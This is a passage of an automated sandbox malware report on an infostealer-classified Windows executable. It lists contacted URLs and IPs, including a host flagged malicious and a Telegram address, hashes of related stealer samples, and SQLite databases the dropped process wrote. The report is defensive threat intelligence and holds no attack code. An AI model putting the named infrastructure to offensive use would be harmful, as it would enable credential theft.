https://permanently-removed.invalid/reauth/v1beta/users/	msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/LogoutYxAB	msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7556	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153191869.0000104000394000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	msedge.exe, 00000015.00000002.2060166432.00007B600016C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2207568613.000010400016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.27.dr	false		high
https://www.youtube.com/?feature=ytcaogl	chrome.exe, 0000000F.00000003.1943483741.000016CC0157C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	Vibrators.com, 0000000B.00000002.2508933737.000000000615F000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505005731.000000000372E000.00000004.00000800.00020000.00000000.sdmp, P8QIEK.11.dr	false		high
https://drive-preprod.corp.google.com/	manifest.json.27.dr	false		high
https://srtb.msn.cn/	2cc80dabc69f58b6_1.27.dr	false		high
https://chrome.google.com/webstore/	manifest.json0.27.dr	false		high
https://bard.google.com/	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/%	chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/$	chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/RotateBoundCookies	msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6692	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/258207403	msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
http://anglebug.com/3625	msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.live.com/mail/0/	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
http://anglebug.com/3624	msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://t.m	Vibrators.com, 0000000B.00000003.1708681108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000003.1708655612.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000003.1708906121.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/5007	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3862	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://assets.msn.com/resolver/	2cc80dabc69f58b6_1.27.dr	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 0000000F.00000003.1926929593.000016CC00CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1916523052.000016CC00494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1916356271.000016CC00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1926878944.000016CC00E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1932103535.000016CC00CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1914593476.000016CC00CC0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4836	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29	chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tidal.com/	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
https://ntp.msn.com	000003.log9.27.dr	false		high
https://msn.com/	msedge.exe, 00000015.00000002.2060738440.00007B60003AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2210399664.00001040002D4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4384	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gaana.com/	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
https://mail.google.com/mail/?tab=rm&ogbl	chrome.exe, 0000000F.00000003.1966072298.000016CC01640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966560548.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965885038.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966072298.000016CC01630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965652470.000016CC01EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1966610265.000016CC01ED8000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
142.250.181.132	www.google.com	United States	15169	GOOGLEUS	false
108.139.47.50	unknown	United States	16509	AMAZON-02US	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.181.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
172.64.41.3	unknown	United States	13335	CLOUDFLARENETUS	false
94.130.191.168	hulkpara.xyz	Germany	24940	HETZNER-ASDE	true
51.104.15.253	unknown	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
18.165.220.57	sb.scorecardresearch.com	United States	3	MIT-GATEWAYSUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.44.203.90	unknown	United States	20940	AKAMAI-ASN1EU	false
23.44.203.15	unknown	United States	20940	AKAMAI-ASN1EU	false

Private

IP
192.168.2.9
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577887
Start date and time:	2024-12-18 21:07:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QIo3SytSZA.exe renamed because original name is a hash value
Original Sample Name:	1f4548aac2c166bacd286c6f5243908f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@98/299@27/16
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 76 Number of non-executed functions: 300
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.17.78, 64.233.162.84, 172.217.17.46, 142.250.181.138, 142.250.181.74, 172.217.19.202, 172.217.17.74, 172.217.19.234, 172.217.17.42, 172.217.19.170, 172.217.19.10, 142.250.181.10, 142.250.181.106, 172.217.17.67, 192.229.221.95, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 13.107.6.158, 23.193.114.18, 172.165.69.228, 92.122.101.42, 92.122.101.18, 104.116.245.64, 104.116.245.80, 104.116.245.83, 104.116.245.121, 23.32.239.58, 2.19.198.17, 2.16.76.24, 2.21.67.64, 2.21.67.57, 2.16.76.32, 13.74.129.1, 204.79.197.237, 13.107.21.237, 92.122.101.19, 92.122.101.11, 142.251.35.163, 142.250.65.227, 142.250.80.99, 142.251.40.131, 142.251.41.3, 142.251.32.99, 20.12.23.50, 2.18.82.9, 94.245.104.56, 20.190.181.5, 13.107.246.40, 4.152.199.46, 23.101.168.44, 104.117.182.41, 23.44.136.156, 131.253.33.239
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, arc.msn.com, redirector.gvt1.com, www.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: QIo3SytSZA.exe

Simulations

Behavior and APIs

Time	Type	Description
15:08:05	API Interceptor	1x Sleep call for process: QIo3SytSZA.exe modified
15:08:10	API Interceptor	1x Sleep call for process: Vibrators.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
108.139.47.50	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
	https://nekofile.eu.org/f8e2cb54931bf39d6c12eo5nc	Get hash	malicious	Unknown	Browse
	http://www.sdmts.com/business-center/for-hire-vehicle-administration&c=E,1,pc5oom8YsW1RqHtANaUTLgMvd2z37r_4n-NR90jlF12Z7NyUKYXr1sKmCXY3dgMIENHwNl8jxylzX2garHrVx3wU2gE5fuDMBydZQ2COLEQJ&typo=1	Get hash	malicious	Unknown	Browse
	https://blyocelectric.com/4xmaf95qR5m4wJYw4	Get hash	malicious	Unknown	Browse
	https://xfv.pages.dev/robots.txt	Get hash	malicious	HTMLPhisher	Browse
	https://jfb.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword	Get hash	malicious	HTMLPhisher	Browse
	Salary.msi	Get hash	malicious	AteraAgent	Browse
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	noll.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	Setup.msi	Get hash	malicious	Vidar	Browse	149.154.167.99
	69633f.msi	Get hash	malicious	Vidar	Browse	149.154.167.99
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	149.154.167.99
	njrtdhadawt.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, Vidar, Xmrig	Browse	149.154.167.99
	https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baa	Get hash	malicious	Unknown	Browse	104.26.10.61
chrome.cloudflare-dns.com	g8ix97hz.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	162.159.61.3
	H3G7Xu6gih.exe	Get hash	malicious	RHADAMANTHYS	Browse	162.159.61.3
	HI6VIJERUn.exe	Get hash	malicious	RHADAMANTHYS	Browse	162.159.61.3
	ko.ps1.2.ps1	Get hash	malicious	Unknown	Browse	162.159.61.3
	NativeApp_G5L1NHZZ.exe	Get hash	malicious	LummaC Stealer	Browse	172.64.41.3
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	162.159.61.3
	EXTERNALRe.msg	Get hash	malicious	Unknown	Browse	162.159.61.3
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	CapCut_12.0.4_Installer.exe	Get hash	malicious	LummaC Stealer	Browse	172.64.41.3
	CapCut_12.0.4_Installer.exe	Get hash	malicious	LummaC Stealer	Browse	162.159.61.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	H3G7Xu6gih.exe	Get hash	malicious	RHADAMANTHYS	Browse	94.245.104.56
	HI6VIJERUn.exe	Get hash	malicious	RHADAMANTHYS	Browse	94.245.104.56
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	94.245.104.56
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	94.245.104.56
	EXTERNALRe.msg	Get hash	malicious	Unknown	Browse	94.245.104.56
	stealer.jar	Get hash	malicious	Can Stealer	Browse	94.245.104.56
	stealer.jar	Get hash	malicious	Can Stealer	Browse	94.245.104.56
	pkqLAMAv96.lnk	Get hash	malicious	RHADAMANTHYS	Browse	94.245.104.56
	IIC0XbKFjS.lnk	Get hash	malicious	RHADAMANTHYS	Browse	94.245.104.56
	873406390.bat	Get hash	malicious	RHADAMANTHYS	Browse	94.245.104.56

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	149.154.167.220
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	149.154.167.220
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	chrome11.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	chrome11.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	noll.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
AMAZON-02US	https://preview.micrasoft-office365.com/f5c275dd184cbe62?l=6	Get hash	malicious	Unknown	Browse	54.231.135.57
	http://mee6.xyz	Get hash	malicious	Unknown	Browse	108.158.75.127
	https://em.navan.com/MDM3LUlLWi04NzEAAAGXecU3IyvXka_yOfm1UXs3oOmq7mq-S6uBgGscrsY0kWMgpLalbadmEIYbTEXYqyKQHEXyRQM=	Get hash	malicious	Unknown	Browse	108.158.75.32
	la.bot.arm6.elf	Get hash	malicious	Mirai	Browse	35.155.74.218
	la.bot.sparc.elf	Get hash	malicious	Mirai	Browse	35.72.55.4
	la.bot.arm.elf	Get hash	malicious	Mirai	Browse	52.199.163.235
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	3.143.19.119
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	54.239.179.118
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	18.181.123.193
	la.bot.arm5.elf	Get hash	malicious	Mirai	Browse	18.217.92.174

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	JiZQEd33mn.exe	Get hash	malicious	Unknown	Browse	23.206.229.209
	random.exe.7.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, Vidar	Browse	23.206.229.209
	Ball - Temp.data for GCMs.doc	Get hash	malicious	HTMLPhisher	Browse	23.206.229.209
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	23.206.229.209
	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse	23.206.229.209
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse	23.206.229.209
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	23.206.229.209
	DVW8WyapUR.exe	Get hash	malicious	Spyrix Keylogger	Browse	23.206.229.209
	#U661f#U8fb0#U9b54#U57df.exe	Get hash	malicious	Metasploit	Browse	23.206.229.209
	Employee Bonus for Ronnie.benton.docx	Get hash	malicious	Unknown	Browse	23.206.229.209
37f463bf4616ecd445d4a1937da06e19	R8CAg00Db8.lnk	Get hash	malicious	Unknown	Browse	94.130.191.168 149.154.167.99
	s4PymYGgSh.lnk	Get hash	malicious	Unknown	Browse	94.130.191.168 149.154.167.99
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	94.130.191.168 149.154.167.99
	solara-executor.exe	Get hash	malicious	Unknown	Browse	94.130.191.168 149.154.167.99
	List of required items and services.pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	94.130.191.168 149.154.167.99
	g8ix97hz.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	94.130.191.168 149.154.167.99
	solara-executor.exe	Get hash	malicious	Unknown	Browse	94.130.191.168 149.154.167.99
	Setup.msi	Get hash	malicious	Unknown	Browse	94.130.191.168 149.154.167.99
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	94.130.191.168 149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	'Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	CapCut_12.0.4_Installer.exe	Get hash	malicious	LummaC Stealer	Browse
	CapCut_12.0.4_Installer.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.msi	Get hash	malicious	Vidar	Browse
	69633f.msi	Get hash	malicious	Vidar	Browse
	fm2r286nqT.exe	Get hash	malicious	LummaC	Browse
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse
	Setup.msi	Get hash	malicious	Vidar	Browse
	SET_UP.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\ProgramData\WBIEKNG4E3WB\5XT00ZUAA

Download File

Process:	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WBIEKNG4E3WB\79R16X

Download File

Process:	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WBIEKNG4E3WB\8QQ9HV

Download File

Process:	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\WBIEKNG4E3WB\9HVAI5

Download File

Process:	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08429357030659952
Encrypted:	false
